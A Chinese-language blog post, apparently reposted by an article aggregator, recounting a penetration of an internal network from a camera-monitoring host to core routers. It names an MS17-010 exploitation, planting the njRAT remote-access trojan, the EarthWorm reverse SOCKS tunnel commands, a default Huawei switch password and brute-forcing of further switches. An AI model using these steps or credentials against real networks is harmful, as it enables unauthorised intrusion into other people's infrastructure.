复盘从一个监控主机到核心路由沦陷
在對內網進行?ms17-010?掃描時,發現 2 臺之前沒有出現過且沒有打補丁的主機,于是,嘗試了一波
kali 主機在掃描時發現 2 臺之前沒有出現過且沒有打補丁的主機
嘗試打了一波
然后種了個?njrat
翻文件的時候發現了點配置文件
?
down?下來解壓后發現是交換機的配置文件,于是有了一個大膽的想法
查看了被控主機的網絡連接后,發現一個地址無法?ping?通,TCP?包也無法到達,推測做了?ACL
于是在被控機上搭了?earthworm?做轉發
本機執行?ew -s rcsocks -l 本地代理端口 -e 遠端連接端口
被控機執行?ew -s rssocks -d 主控機IP -e 遠端連接端口
然后開啟?proxifier?的代理功能,成功訪問了那個系統,但這不是主要目的
在咨詢了好哥們后,他建議嘗試搞搞交換機看看
在對?10.2.66/24?網段掃描后發現?10.2.66.254?開放了?80?和?23?端口,嘗試?xshell?連接
成功使用?huawei?密碼?huawei@1234?連接,繼續翻上級路由
發現了?10.2.20.1
繼續?telnet
繼續翻
發現 10.2.20.58
繼續翻,翻到 10.4.0.1
繼續 telnet
另外發現此時可以 ping 通 10.4.0.1 這臺交換機
于是乎,扔瀏覽器打開看看
?
拿下后將本次收集到的密碼與巡風掃描到的 telnet 主機進行爆破后發現了更多的交換機。。。。。。
總結
以上是生活随笔為你收集整理的复盘从一个监控主机到核心路由沦陷的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 实战渗透-Shiro反序列化漏洞实例
- 下一篇: BurpSuite技巧之二重代理